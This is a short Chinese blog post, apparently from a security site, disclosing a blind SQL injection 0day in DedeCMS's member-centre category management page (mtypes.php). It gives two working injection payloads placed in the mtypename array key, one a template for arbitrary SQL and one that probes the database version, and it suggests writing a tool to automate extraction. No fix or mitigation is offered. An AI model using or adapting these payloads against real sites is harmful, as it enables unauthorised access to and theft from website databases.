DedeCMS会员中心分类管理SQL注射0day

分类:安全 | 2012-12-30 | 撸过 86 次
0人扯谈

漏洞描述:

需要magic_quotes_gpc = Off,所以说是鸡肋啊.

发生在数组key里的注射漏洞,有点意思.

这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下

https://www.webshell.cc/member/mtypes.php?dopost=save

exploit:

mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
本站内容均为原创,转载请务必保留署名与链接!
DedeCMS会员中心分类管理SQL注射0day:https://www.webshell.cc/4172.html

随机日志